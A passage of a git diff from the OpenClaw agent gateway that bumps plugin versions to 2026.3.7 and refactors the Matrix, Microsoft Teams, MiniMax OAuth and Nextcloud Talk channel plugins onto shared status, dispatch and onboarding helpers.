"@openclaw/llm-task", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw JSON-only LLM task plugin", "type": "module", diff --git a/extensions/lobster/package.json b/extensions/lobster/package.json index 8bc2465562f..cf501a4b7fd 100644 --- a/extensions/lobster/package.json +++ b/extensions/lobster/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/lobster", - "version": "2026.3.3", + "version": "2026.3.7", "description": "Lobster workflow tool plugin (typed pipelines + resumable approvals)", "type": "module", "dependencies": { diff --git a/extensions/matrix/CHANGELOG.md b/extensions/matrix/CHANGELOG.md index 755416bd6ed..44232630600 100644 --- a/extensions/matrix/CHANGELOG.md +++ b/extensions/matrix/CHANGELOG.md @@ -1,5 +1,11 @@ # Changelog +## 2026.3.7 + +### Changes + +- Version alignment with core OpenClaw release numbers. + ## 2026.3.3 ### Changes diff --git a/extensions/matrix/package.json b/extensions/matrix/package.json index 2fc14ffadd6..aada31c09a7 100644 --- a/extensions/matrix/package.json +++ b/extensions/matrix/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/matrix", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Matrix channel plugin", "type": "module", "dependencies": { diff --git a/extensions/matrix/src/channel.ts b/extensions/matrix/src/channel.ts index 3ccfd2a8ae4..29dfe5fd357 100644 --- a/extensions/matrix/src/channel.ts +++ b/extensions/matrix/src/channel.ts @@ -2,6 +2,7 @@ import { applyAccountNameToChannelSection, buildChannelConfigSchema, buildProbeChannelStatusSummary, + collectStatusIssuesFromLastError, DEFAULT_ACCOUNT_ID, deleteAccountFromConfigSection, formatPairingApproveHint, @@ -380,21 +381,7 @@ export const matrixPlugin: ChannelPlugin = { lastStopAt: null, lastError: null, }, - collectStatusIssues: (accounts) => - accounts.flatMap((account) => { - const lastError = typeof account.lastError === "string" ? account.lastError.trim() : ""; - if (!lastError) { - return []; - } - return [ - { - channel: "matrix", - accountId: account.accountId, - kind: "runtime", - message: `Channel error: ${lastError}`, - }, - ]; - }), + collectStatusIssues: (accounts) => collectStatusIssuesFromLastError("matrix", accounts), buildChannelSummary: ({ snapshot }) => buildProbeChannelStatusSummary(snapshot, { baseUrl: snapshot.baseUrl ?? null }), probeAccount: async ({ account, timeoutMs, cfg }) => { diff --git a/extensions/matrix/src/matrix/monitor/handler.ts b/extensions/matrix/src/matrix/monitor/handler.ts index 53651ce4b16..bacd6890ab9 100644 --- a/extensions/matrix/src/matrix/monitor/handler.ts +++ b/extensions/matrix/src/matrix/monitor/handler.ts @@ -4,9 +4,11 @@ import { createScopedPairingAccess, createReplyPrefixOptions, createTypingCallbacks, + dispatchReplyFromConfigWithSettledDispatcher, formatAllowlistMatchMeta, logInboundDrop, logTypingFailure, + resolveInboundSessionEnvelopeContext, resolveControlCommandGate, type PluginRuntime, type RuntimeEnv, @@ -484,14 +486,12 @@ export function createMatrixRoomMessageHandler(params: MatrixMonitorHandlerParam const textWithId = threadRootId ? `${bodyText}\n[matrix event id: ${messageId} room: ${roomId} thread: ${threadRootId}]` : `${bodyText}\n[matrix event id: ${messageId} room: ${roomId}]`; - const storePath = core.channel.session.resolveStorePath(cfg.session?.store, { - agentId: route.agentId, - }); - const envelopeOptions = core.channel.reply.resolveEnvelopeFormatOptions(cfg); - const previousTimestamp = core.channel.session.readSessionUpdatedAt({ - storePath, - sessionKey: route.sessionKey, - }); + const { storePath, envelopeOptions, previousTimestamp } = + resolveInboundSessionEnvelopeContext({ + cfg, + agentId: route.agentId, + sessionKey: route.sessionKey, + }); const body = core.channel.reply.formatInboundEnvelope({ channel: "Matrix", from: envelopeFrom, @@ -655,22 +655,18 @@ export function createMatrixRoomMessageHandler(params: MatrixMonitorHandlerParam }, }); - const { queuedFinal, counts } = await core.channel.reply.withReplyDispatcher({ + const { queuedFinal, counts } = await dispatchReplyFromConfigWithSettledDispatcher({ + cfg, + ctxPayload, dispatcher, onSettled: () => { markDispatchIdle(); }, - run: () => - core.channel.reply.dispatchReplyFromConfig({ - ctx: ctxPayload, - cfg, - dispatcher, - replyOptions: { - ...replyOptions, - skillFilter: roomConfig?.skills, - onModelSelected, - }, - }), + replyOptions: { + ...replyOptions, + skillFilter: roomConfig?.skills, + onModelSelected, + }, }); if (!queuedFinal) { return; diff --git a/extensions/matrix/src/matrix/monitor/index.ts b/extensions/matrix/src/matrix/monitor/index.ts index 2449b215715..1634a75502b 100644 --- a/extensions/matrix/src/matrix/monitor/index.ts +++ b/extensions/matrix/src/matrix/monitor/index.ts @@ -1,7 +1,7 @@ import { - createLoggerBackedRuntime, GROUP_POLICY_BLOCKED_LABEL, mergeAllowlist, + resolveRuntimeEnv, resolveAllowlistProviderRuntimeGroupPolicy, resolveDefaultGroupPolicy, summarizeMapping, @@ -241,11 +241,10 @@ export async function monitorMatrixProvider(opts: MonitorMatrixOpts = {}): Promi } const logger = core.logging.getChildLogger({ module: "matrix-auto-reply" }); - const runtime: RuntimeEnv = - opts.runtime ?? - createLoggerBackedRuntime({ - logger, - }); + const runtime: RuntimeEnv = resolveRuntimeEnv({ + runtime: opts.runtime, + logger, + }); const logVerboseMessage = (message: string) => { if (!core.logging.shouldLogVerbose()) { return; diff --git a/extensions/mattermost/package.json b/extensions/mattermost/package.json index 6f93c8c53c0..6434d689760 100644 --- a/extensions/mattermost/package.json +++ b/extensions/mattermost/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/mattermost", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Mattermost channel plugin", "type": "module", "dependencies": { diff --git a/extensions/memory-core/package.json b/extensions/memory-core/package.json index 25b87193258..e5388b49755 100644 --- a/extensions/memory-core/package.json +++ b/extensions/memory-core/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/memory-core", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw core memory search plugin", "type": "module", diff --git a/extensions/memory-lancedb/package.json b/extensions/memory-lancedb/package.json index a9e05c3f4f6..9663560a60a 100644 --- a/extensions/memory-lancedb/package.json +++ b/extensions/memory-lancedb/package.json @@ -1,13 +1,13 @@ { "name": "@openclaw/memory-lancedb", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw LanceDB-backed long-term memory plugin with auto-recall/capture", "type": "module", "dependencies": { "@lancedb/lancedb": "^0.26.2", "@sinclair/typebox": "0.34.48", - "openai": "^6.25.0" + "openai": "^6.27.0" }, "openclaw": { "extensions": [ diff --git a/extensions/minimax-portal-auth/index.ts b/extensions/minimax-portal-auth/index.ts index 6eee6bdabe1..d2d1bab9899 100644 --- a/extensions/minimax-portal-auth/index.ts +++ b/extensions/minimax-portal-auth/index.ts @@ -1,4 +1,5 @@ import { + buildOauthProviderAuthResult, emptyPluginConfigSchema, type OpenClawPluginApi, type ProviderAuthContext, @@ -60,22 +61,14 @@ function createOAuthHandler(region: MiniMaxRegion) { await ctx.prompter.note(result.notification_message, "MiniMax OAuth"); } - const profileId = `${PROVIDER_ID}:default`; const baseUrl = result.resourceUrl || defaultBaseUrl; - return { - profiles: [ - { - profileId, - credential: { - type: "oauth" as const, - provider: PROVIDER_ID, - access: result.access, - refresh: result.refresh, - expires: result.expires, - }, - }, - ], + return buildOauthProviderAuthResult({ + providerId: PROVIDER_ID, + defaultModel: modelRef(DEFAULT_MODEL), + access: result.access, + refresh: result.refresh, + expires: result.expires, configPatch: { models: { providers: { @@ -119,13 +112,12 @@ function createOAuthHandler(region: MiniMaxRegion) { }, }, }, - defaultModel: modelRef(DEFAULT_MODEL), notes: [ "MiniMax OAuth tokens auto-refresh. Re-run login if refresh fails or access is revoked.", `Base URL defaults to ${defaultBaseUrl}. Override models.providers.${PROVIDER_ID}.baseUrl if needed.`, ...(result.notification_message ? [result.notification_message] : []), ], - }; + }); } catch (err) { const errorMsg = err instanceof Error ? err.message : String(err); progress.stop(`MiniMax OAuth failed: ${errorMsg}`); diff --git a/extensions/minimax-portal-auth/package.json b/extensions/minimax-portal-auth/package.json index 80e767562de..040480ffc9f 100644 --- a/extensions/minimax-portal-auth/package.json +++ b/extensions/minimax-portal-auth/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/minimax-portal-auth", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw MiniMax Portal OAuth provider plugin", "type": "module", diff --git a/extensions/msteams/CHANGELOG.md b/extensions/msteams/CHANGELOG.md index f062ef907e2..882c4cbcc9b 100644 --- a/extensions/msteams/CHANGELOG.md +++ b/extensions/msteams/CHANGELOG.md @@ -1,5 +1,11 @@ # Changelog +## 2026.3.7 + +### Changes + +- Version alignment with core OpenClaw release numbers. + ## 2026.3.3 ### Changes diff --git a/extensions/msteams/package.json b/extensions/msteams/package.json index 8689f51cd16..c5841204402 100644 --- a/extensions/msteams/package.json +++ b/extensions/msteams/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/msteams", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Microsoft Teams channel plugin", "type": "module", "dependencies": { diff --git a/extensions/msteams/src/channel.ts b/extensions/msteams/src/channel.ts index 90223956988..be804a25c44 100644 --- a/extensions/msteams/src/channel.ts +++ b/extensions/msteams/src/channel.ts @@ -4,7 +4,8 @@ import type { OpenClawConfig, } from "openclaw/plugin-sdk/msteams"; import { - buildBaseChannelStatusSummary, + buildProbeChannelStatusSummary, + buildRuntimeAccountStatusSnapshot, buildChannelConfigSchema, createDefaultChannelRuntimeState, DEFAULT_ACCOUNT_ID, @@ -250,11 +251,43 @@ export const msteamsPlugin: ChannelPlugin = { name: undefined as string | undefined, note: undefined as string | undefined, })); + type ResolveTargetResultEntry = (typeof results)[number]; + type PendingTargetEntry = { input: string; query: string; index: number }; const stripPrefix = (value: string) => normalizeMSTeamsUserInput(value); + const markPendingLookupFailed = (pending: PendingTargetEntry[]) => { + pending.forEach(({ index }) => { + const entry = results[index]; + if (entry) { + entry.note = "lookup failed"; + } + }); + }; + const resolvePending = async ( + pending: PendingTargetEntry[], + resolveEntries: (entries: string[]) => Promise, + applyResolvedEntry: (target: ResolveTargetResultEntry, entry: T) => void, + ) => { + if (pending.length === 0) { + return; + } + try { + const resolved = await resolveEntries(pending.map((entry) => entry.query)); + resolved.forEach((entry, idx) => { + const target = results[pending[idx]?.index ?? -1]; + if (!target) { + return; + } + applyResolvedEntry(target, entry); + }); + } catch (err) { + runtime.error?.(`msteams resolve failed: ${String(err)}`); + markPendingLookupFailed(pending); + } + }; if (kind === "user") { - const pending: Array<{ input: string; query: string; index: number }> = []; + const pending: PendingTargetEntry[] = []; results.forEach((entry, index) => { const trimmed = entry.input.trim(); if (!trimmed) { @@ -270,37 +303,21 @@ export const msteamsPlugin: ChannelPlugin = { pending.push({ input: entry.input, query: cleaned, index }); }); - if (pending.length > 0) { - try { - const resolved = await resolveMSTeamsUserAllowlist({ - cfg, - entries: pending.map((entry) => entry.query), - }); - resolved.forEach((entry, idx) => { - const target = results[pending[idx]?.index ?? -1]; - if (!target) { - return; - } - target.resolved = entry.resolved; - target.id = entry.id; - target.name = entry.name; - target.note = entry.note; - }); - } catch (err) { - runtime.error?.(`msteams resolve failed: ${String(err)}`); - pending.forEach(({ index }) => { - const entry = results[index]; - if (entry) { - entry.note = "lookup failed"; - } - }); - } - } + await resolvePending( + pending, + (entries) => resolveMSTeamsUserAllowlist({ cfg, entries }), + (target, entry) => { + target.resolved = entry.resolved; + target.id = entry.id; + target.name = entry.name; + target.note = entry.note; + }, + ); return results; } - const pending: Array<{ input: string; query: string; index: number }> = []; + const pending: PendingTargetEntry[] = []; results.forEach((entry, index) => { const trimmed = entry.input.trim(); if (!trimmed) { @@ -323,48 +340,32 @@ export const msteamsPlugin: ChannelPlugin = { pending.push({ input: entry.input, query, index }); }); - if (pending.length > 0) { - try { - const resolved = await resolveMSTeamsChannelAllowlist({ - cfg, - entries: pending.map((entry) => entry.query), - }); - resolved.forEach((entry, idx) => { - const target = results[pending[idx]?.index ?? -1]; - if (!target) { - return; - } - if (!entry.resolved || !entry.teamId) { - target.resolved = false; - target.note = entry.note; - return; - } - target.resolved = true; - if (entry.channelId) { - target.id = `${entry.teamId}/${entry.channelId}`; - target.name = - entry.channelName && entry.teamName - ? `${entry.teamName}/${entry.channelName}` - : (entry.channelName ?? entry.teamName); - } else { - target.id = entry.teamId; - target.name = entry.teamName; - target.note = "team id"; - } - if (entry.note) { - target.note = entry.note; - } - }); - } catch (err) { - runtime.error?.(`msteams resolve failed: ${String(err)}`); - pending.forEach(({ index }) => { - const entry = results[index]; - if (entry) { - entry.note = "lookup failed"; - } - }); - } - } + await resolvePending( + pending, + (entries) => resolveMSTeamsChannelAllowlist({ cfg, entries }), + (target, entry) => { + if (!entry.resolved || !entry.teamId) { + target.resolved = false; + target.note = entry.note; + return; + } + target.resolved = true; + if (entry.channelId) { + target.id = `${entry.teamId}/${entry.channelId}`; + target.name = + entry.channelName && entry.teamName + ? `${entry.teamName}/${entry.channelName}` + : (entry.channelName ?? entry.teamName); + } else { + target.id = entry.teamId; + target.name = entry.teamName; + target.note = "team id"; + } + if (entry.note) { + target.note = entry.note; + } + }, + ); return results; }, @@ -429,23 +430,17 @@ export const msteamsPlugin: ChannelPlugin = { outbound: msteamsOutbound, status: { defaultRuntime: createDefaultChannelRuntimeState(DEFAULT_ACCOUNT_ID, { port: null }), - buildChannelSummary: ({ snapshot }) => ({ - ...buildBaseChannelStatusSummary(snapshot), - port: snapshot.port ?? null, - probe: snapshot.probe, - lastProbeAt: snapshot.lastProbeAt ?? null, - }), + buildChannelSummary: ({ snapshot }) => + buildProbeChannelStatusSummary(snapshot, { + port: snapshot.port ?? null, + }), probeAccount: async ({ cfg }) => await probeMSTeams(cfg.channels?.msteams), buildAccountSnapshot: ({ account, runtime, probe }) => ({ accountId: account.accountId, enabled: account.enabled, configured: account.configured, - running: runtime?.running ?? false, - lastStartAt: runtime?.lastStartAt ?? null, - lastStopAt: runtime?.lastStopAt ?? null, - lastError: runtime?.lastError ?? null, + ...buildRuntimeAccountStatusSnapshot({ runtime, probe }), port: runtime?.port ?? null, - probe, }), }, gateway: { diff --git a/extensions/msteams/src/messenger.test.ts b/extensions/msteams/src/messenger.test.ts index 627bad15d94..aa0a92b5159 100644 --- a/extensions/msteams/src/messenger.test.ts +++ b/extensions/msteams/src/messenger.test.ts @@ -72,6 +72,17 @@ const createRecordedSendActivity = ( }; }; +const REVOCATION_ERROR = "Cannot perform 'set' on a proxy that has been revoked"; + +const createFallbackAdapter = (proactiveSent: string[]): MSTeamsAdapter => ({ + continueConversation: async (_appId, _reference, logic) => { + await logic({ + sendActivity: createRecordedSendActivity(proactiveSent), + }); + }, + process: async () => {}, +}); + describe("msteams messenger", () => { beforeEach(() => { setMSTeamsRuntime(runtimeStub); @@ -297,18 +308,11 @@ describe("msteams messenger", () => { const ctx = { sendActivity: async () => { - throw new TypeError("Cannot perform 'set' on a proxy that has been revoked"); + throw new TypeError(REVOCATION_ERROR); }, }; - const adapter: MSTeamsAdapter = { - continueConversation: async (_appId, _reference, logic) => { - await logic({ - sendActivity: createRecordedSendActivity(proactiveSent), - }); - }, - process: async () => {}, - }; + const adapter = createFallbackAdapter(proactiveSent); const ids = await sendMSTeamsMessages({ replyStyle: "thread", @@ -338,18 +342,11 @@ describe("msteams messenger", () => { threadSent.push(content); return { id: `id:${content}` }; } - throw new TypeError("Cannot perform 'set' on a proxy that has been revoked"); + throw new TypeError(REVOCATION_ERROR); }, }; - const adapter: MSTeamsAdapter = { - continueConversation: async (_appId, _reference, logic) => { - await logic({ - sendActivity: createRecordedSendActivity(proactiveSent), - }); - }, - process: async () => {}, - }; + const adapter = createFallbackAdapter(proactiveSent); const ids = await sendMSTeamsMessages({ replyStyle: "thread", diff --git a/extensions/msteams/src/monitor-handler/message-handler.ts b/extensions/msteams/src/monitor-handler/message-handler.ts index b4a305fd7d4..ba68fc9f5c9 100644 --- a/extensions/msteams/src/monitor-handler/message-handler.ts +++ b/extensions/msteams/src/monitor-handler/message-handler.ts @@ -2,6 +2,7 @@ import { DEFAULT_ACCOUNT_ID, buildPendingHistoryContextFromMap, clearHistoryEntriesIfEnabled, + dispatchReplyFromConfigWithSettledDispatcher, DEFAULT_GROUP_HISTORY_LIMIT, createScopedPairingAccess, logInboundDrop, @@ -11,6 +12,7 @@ import { isDangerousNameMatchingEnabled, readStoreAllowFromForDmPolicy, resolveMentionGating, + resolveInboundSessionEnvelopeContext, formatAllowlistMatchMeta, resolveEffectiveAllowFromLists, resolveDmGroupAccessWithLists, @@ -451,12 +453,9 @@ export function createMSTeamsMessageHandler(deps: MSTeamsMessageHandlerDeps) { const mediaPayload = buildMSTeamsMediaPayload(mediaList); const envelopeFrom = isDirectMessage ? senderName : conversationType; - const storePath = core.channel.session.resolveStorePath(cfg.session?.store, { + const { storePath, envelopeOptions, previousTimestamp } = resolveInboundSessionEnvelopeContext({ + cfg, agentId: route.agentId, - }); - const envelopeOptions = core.channel.reply.resolveEnvelopeFormatOptions(cfg); - const previousTimestamp = core.channel.session.readSessionUpdatedAt({ - storePath, sessionKey: route.sessionKey, }); const body = core.channel.reply.formatAgentEnvelope({ @@ -559,18 +558,14 @@ export function createMSTeamsMessageHandler(deps: MSTeamsMessageHandlerDeps) { log.info("dispatching to agent", { sessionKey: route.sessionKey }); try { - const { queuedFinal, counts } = await core.channel.reply.withReplyDispatcher({ + const { queuedFinal, counts } = await dispatchReplyFromConfigWithSettledDispatcher({ + cfg, + ctxPayload, dispatcher, onSettled: () => { markDispatchIdle(); }, - run: () => - core.channel.reply.dispatchReplyFromConfig({ - ctx: ctxPayload, - cfg, - dispatcher, - replyOptions, - }), + replyOptions, }); log.info("dispatch complete", { queuedFinal, counts }); diff --git a/extensions/msteams/src/send.ts b/extensions/msteams/src/send.ts index cfa023d8871..48fe0443a22 100644 --- a/extensions/msteams/src/send.ts +++ b/extensions/msteams/src/send.ts @@ -157,24 +157,13 @@ export async function sendMessageMSTeams( log.debug?.("sending file consent card", { uploadId, fileName, size: media.buffer.length }); - const baseRef = buildConversationReference(ref); - const proactiveRef = { ...baseRef, activityId: undefined }; - - let messageId = "unknown"; - try { - await adapter.continueConversation(appId, proactiveRef, async (turnCtx) => { - const response = await turnCtx.sendActivity(activity); - messageId = extractMessageId(response) ?? "unknown"; - }); - } catch (err) { - const classification = classifyMSTeamsSendError(err); - const hint = formatMSTeamsSendErrorHint(classification); - const status = classification.statusCode ? ` (HTTP ${classification.statusCode})` : ""; - throw new Error( - `msteams consent card send failed${status}: ${formatUnknownError(err)}${hint ? ` (${hint})` : ""}`, - { cause: err }, - ); - } + const messageId = await sendProactiveActivity({ + adapter, + appId, + ref, + activity, + errorPrefix: "msteams consent card send", + }); log.info("sent file consent card", { conversationId, messageId, uploadId }); @@ -245,14 +234,11 @@ export async function sendMessageMSTeams( text: messageText || undefined, attachments: [fileCardAttachment], }; - - const baseRef = buildConversationReference(ref); - const proactiveRef = { ...baseRef, activityId: undefined }; - - let messageId = "unknown"; - await adapter.continueConversation(appId, proactiveRef, async (turnCtx) => { - const response = await turnCtx.sendActivity(activity); - messageId = extractMessageId(response) ?? "unknown"; + const messageId = await sendProactiveActivityRaw({ + adapter, + appId, + ref, + activity, }); log.info("sent native file card", { @@ -288,14 +274,11 @@ export async function sendMessageMSTeams( type: "message", text: messageText ? `${messageText}\n\n${fileLink}` : fileLink, }; - - const baseRef = buildConversationReference(ref); - const proactiveRef = { ...baseRef, activityId: undefined }; - - let messageId = "unknown"; - await adapter.continueConversation(appId, proactiveRef, async (turnCtx) => { - const response = await turnCtx.sendActivity(activity); - messageId = extractMessageId(response) ?? "unknown"; + const messageId = await sendProactiveActivityRaw({ + adapter, + appId, + ref, + activity, }); log.info("sent message with OneDrive file link", { @@ -382,13 +365,14 @@ type ProactiveActivityParams = { errorPrefix: string; }; -async function sendProactiveActivity({ +type ProactiveActivityRawParams = Omit; + +async function sendProactiveActivityRaw({ adapter, appId, ref, activity, - errorPrefix, -}: ProactiveActivityParams): Promise { +}: ProactiveActivityRawParams): Promise { const baseRef = buildConversationReference(ref); const proactiveRef = { ...baseRef, @@ -396,12 +380,27 @@ async function sendProactiveActivity({ }; let messageId = "unknown"; + await adapter.continueConversation(appId, proactiveRef, async (ctx) => { + const response = await ctx.sendActivity(activity); + messageId = extractMessageId(response) ?? "unknown"; + }); + return messageId; +} + +async function sendProactiveActivity({ + adapter, + appId, + ref, + activity, + errorPrefix, +}: ProactiveActivityParams): Promise { try { - await adapter.continueConversation(appId, proactiveRef, async (ctx) => { - const response = await ctx.sendActivity(activity); - messageId = extractMessageId(response) ?? "unknown"; + return await sendProactiveActivityRaw({ + adapter, + appId, + ref, + activity, }); - return messageId; } catch (err) { const classification = classifyMSTeamsSendError(err); const hint = formatMSTeamsSendErrorHint(classification); diff --git a/extensions/nextcloud-talk/package.json b/extensions/nextcloud-talk/package.json index e3f3fcbeb03..74e9e2e5a55 100644 --- a/extensions/nextcloud-talk/package.json +++ b/extensions/nextcloud-talk/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/nextcloud-talk", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Nextcloud Talk channel plugin", "type": "module", "dependencies": { diff --git a/extensions/nextcloud-talk/src/channel.ts b/extensions/nextcloud-talk/src/channel.ts index 003a118e2ef..a547a735ad3 100644 --- a/extensions/nextcloud-talk/src/channel.ts +++ b/extensions/nextcloud-talk/src/channel.ts @@ -1,6 +1,9 @@ import { applyAccountNameToChannelSection, + buildBaseChannelStatusSummary, buildChannelConfigSchema, + buildRuntimeAccountStatusSnapshot, + clearAccountEntryFields, DEFAULT_ACCOUNT_ID, deleteAccountFromConfigSection, formatPairingApproveHint, @@ -288,17 +291,21 @@ export const nextcloudTalkPlugin: ChannelPlugin = lastStopAt: null, lastError: null, }, - buildChannelSummary: ({ snapshot }) => ({ - configured: snapshot.configured ?? false, - secretSource: snapshot.secretSource ?? "none", - running: snapshot.running ?? false, - mode: "webhook", - lastStartAt: snapshot.lastStartAt ?? null, - lastStopAt: snapshot.lastStopAt ?? null, - lastError: snapshot.lastError ?? null, - }), + buildChannelSummary: ({ snapshot }) => { + const base = buildBaseChannelStatusSummary(snapshot); + return { + configured: base.configured, + secretSource: snapshot.secretSource ?? "none", + running: base.running, + mode: "webhook", + lastStartAt: base.lastStartAt, + lastStopAt: base.lastStopAt, + lastError: base.lastError, + }; + }, buildAccountSnapshot: ({ account, runtime }) => { const configured = Boolean(account.secret?.trim() && account.baseUrl?.trim()); + const runtimeSnapshot = buildRuntimeAccountStatusSnapshot({ runtime }); return { accountId: account.accountId, name: account.name, @@ -306,10 +313,10 @@ export const nextcloudTalkPlugin: ChannelPlugin = configured, secretSource: account.secretSource, baseUrl: account.baseUrl ? "[set]" : "[missing]", - running: runtime?.running ?? false, - lastStartAt: runtime?.lastStartAt ?? null, - lastStopAt: runtime?.lastStopAt ?? null, - lastError: runtime?.lastError ?? null, + running: runtimeSnapshot.running, + lastStartAt: runtimeSnapshot.lastStartAt, + lastStopAt: runtimeSnapshot.lastStopAt, + lastError: runtimeSnapshot.lastError, mode: "webhook", lastInboundAt: runtime?.lastInboundAt ?? null, lastOutboundAt: runtime?.lastOutboundAt ?? null, @@ -353,36 +360,20 @@ export const nextcloudTalkPlugin: ChannelPlugin = cleared = true; changed = true; } - const accounts = - nextSection.accounts && typeof nextSection.accounts === "object" - ? { ...nextSection.accounts } - : undefined; - if (accounts && accountId in accounts) { - const entry = accounts[accountId]; - if (entry && typeof entry === "object") { - const nextEntry = { ...entry } as Record; - if ("botSecret" in nextEntry) { - const secret = nextEntry.botSecret; - if (typeof secret === "string" ? secret.trim() : secret) { - cleared = true; - } - delete nextEntry.botSecret; - changed = true; - } - if (Object.keys(nextEntry).length === 0) { - delete accounts[accountId]; - changed = true; - } else { - accounts[accountId] = nextEntry as typeof entry; - } + const accountCleanup = clearAccountEntryFields({ + accounts: nextSection.accounts, + accountId, + fields: ["botSecret"], + }); + if (accountCleanup.changed) { + changed = true; + if (accountCleanup.cleared) { + cleared = true; } - } - if (accounts) { - if (Object.keys(accounts).length === 0) { - delete nextSection.accounts; - changed = true; + if (accountCleanup.nextAccounts) { + nextSection.accounts = accountCleanup.nextAccounts; } else { - nextSection.accounts = accounts; + delete nextSection.accounts; } } } diff --git a/extensions/nextcloud-talk/src/inbound.authz.test.ts b/extensions/nextcloud-talk/src/inbound.authz.test.ts index 188820eeb6d..f19fa73e020 100644 --- a/extensions/nextcloud-talk/src/inbound.authz.test.ts +++ b/extensions/nextcloud-talk/src/inbound.authz.test.ts @@ -45,7 +45,7 @@ describe("nextcloud-talk inbound authz", () => { enabled: true, baseUrl: "", secret: "", - secretSource: "none", + secretSource: "none", // pragma: allowlist secret config: { dmPolicy: "pairing", allowFrom: [], diff --git a/extensions/nextcloud-talk/src/inbound.ts b/extensions/nextcloud-talk/src/inbound.ts index 3b0addf257d..1657cbd9113 100644 --- a/extensions/nextcloud-talk/src/inbound.ts +++ b/extensions/nextcloud-talk/src/inbound.ts @@ -1,8 +1,7 @@ import { GROUP_POLICY_BLOCKED_LABEL, createScopedPairingAccess, - createNormalizedOutboundDeliverer, - createReplyPrefixOptions, + dispatchInboundReplyWithBase, formatTextWithAttachmentLinks, logInboundDrop, readStoreAllowFromForDmPolicy, @@ -291,43 +290,30 @@ export async function handleNextcloudTalkInbound(params: { CommandAuthorized: commandAuthorized, }); - await core.channel.session.recordInboundSession({ + await dispatchInboundReplyWithBase({ + cfg: config as OpenClawConfig, + channel: CHANNEL_ID, + accountId: account.accountId, + route, storePath, - sessionKey: ctxPayload.SessionKey ?? route.sessionKey, - ctx: ctxPayload, + ctxPayload, + core, + deliver: async (payload) => { + await deliverNextcloudTalkReply({ + payload, + roomToken, + accountId: account.accountId, + statusSink, + }); + }, onRecordError: (err) => { runtime.error?.(`nextcloud-talk: failed updating session meta: ${String(err)}`); }, - }); - - const { onModelSelected, ...prefixOptions } = createReplyPrefixOptions({ - cfg: config as OpenClawConfig, - agentId: route.agentId, - channel: CHANNEL_ID, - accountId: account.accountId, - }); - const deliverReply = createNormalizedOutboundDeliverer(async (payload) => { - await deliverNextcloudTalkReply({ - payload, - roomToken, - accountId: account.accountId, - statusSink, - }); - }); - - await core.channel.reply.dispatchReplyWithBufferedBlockDispatcher({ - ctx: ctxPayload, - cfg: config as OpenClawConfig, - dispatcherOptions: { - ...prefixOptions, - deliver: deliverReply, - onError: (err, info) => { - runtime.error?.(`nextcloud-talk ${info.kind} reply failed: ${String(err)}`); - }, + onDispatchError: (err, info) => { + runtime.error?.(`nextcloud-talk ${info.kind} reply failed: ${String(err)}`); }, replyOptions: { skillFilter: roomConfig?.skills, - onModelSelected, disableBlockStreaming: typeof account.config.blockStreaming === "boolean" ? !account.config.blockStreaming diff --git a/extensions/nextcloud-talk/src/monitor.test-fixtures.ts b/extensions/nextcloud-talk/src/monitor.test-fixtures.ts index 21d41976c98..1a65a1b25e6 100644 --- a/extensions/nextcloud-talk/src/monitor.test-fixtures.ts +++ b/extensions/nextcloud-talk/src/monitor.test-fixtures.ts @@ -16,7 +16,7 @@ export function createSignedCreateMessageRequest(params?: { backend?: string }) const body = JSON.stringify(payload); const { random, signature } = generateNextcloudTalkSignature({ body, - secret: "nextcloud-secret", + secret: "nextcloud-secret", // pragma: allowlist secret }); return { body, diff --git a/extensions/nextcloud-talk/src/onboarding.ts b/extensions/nextcloud-talk/src/onboarding.ts index 1f07ce48162..71d904c7a0e 100644 --- a/extensions/nextcloud-talk/src/onboarding.ts +++ b/extensions/nextcloud-talk/src/onboarding.ts @@ -43,6 +43,45 @@ function setNextcloudTalkDmPolicy(cfg: CoreConfig, dmPolicy: DmPolicy): CoreConf } as CoreConfig; } +function setNextcloudTalkAccountConfig( + cfg: CoreConfig, + accountId: string, + updates: Record, +): CoreConfig { + if (accountId === DEFAULT_ACCOUNT_ID) { + return { + ...cfg, + channels: { + ...cfg.channels, + "nextcloud-talk": { + ...cfg.channels?.["nextcloud-talk"], + enabled: true, + ...updates, + }, + }, + }; + } + + return { + ...cfg, + channels: { + ...cfg.channels, + "nextcloud-talk": { + ...cfg.channels?.["nextcloud-talk"], + enabled: true, + accounts: { + ...cfg.channels?.["nextcloud-talk"]?.accounts, + [accountId]: { + ...cfg.channels?.["nextcloud-talk"]?.accounts?.[accountId], + enabled: cfg.channels?.["nextcloud-talk"]?.accounts?.[accountId]?.enabled ?? true, + ...updates, + }, + }, + }, + }, + }; +} + async function noteNextcloudTalkSecretHelp(prompter: WizardPrompter): Promise { await prompter.note( [ @@ -105,40 +144,10 @@ async function promptNextcloudTalkAllowFrom(params: { ]; const unique = mergeAllowFromEntries(undefined, merged); - if (accountId === DEFAULT_ACCOUNT_ID) { - return { - ...cfg, - channels: { - ...cfg.channels, - "nextcloud-talk": { - ...cfg.channels?.["nextcloud-talk"], - enabled: true, - dmPolicy: "allowlist", - allowFrom: unique, - }, - }, - }; - } - - return { - ...cfg, - channels: { - ...cfg.channels, - "nextcloud-talk": { - ...cfg.channels?.["nextcloud-talk"], - enabled: true, - accounts: { - ...cfg.channels?.["nextcloud-talk"]?.accounts, - [accountId]: { - ...cfg.channels?.["nextcloud-talk"]?.accounts?.[accountId], - enabled: cfg.channels?.["nextcloud-talk"]?.accounts?.[accountId]?.enabled ?? true, - dmPolicy: "allowlist", - allowFrom: unique, - }, - }, - }, - }, - }; + return setNextcloudTalkAccountConfig(cfg, accountId, { + dmPolicy: "allowlist", + allowFrom: unique, + }); } async function promptNextcloudTalkAllowFromForAccount(params: { @@ -265,41 +274,10 @@ export const nextcloudTalkOnboardingAdapter: ChannelOnboardingAdapter = { } if (secretResult.action === "use-env" || secret || baseUrl !== 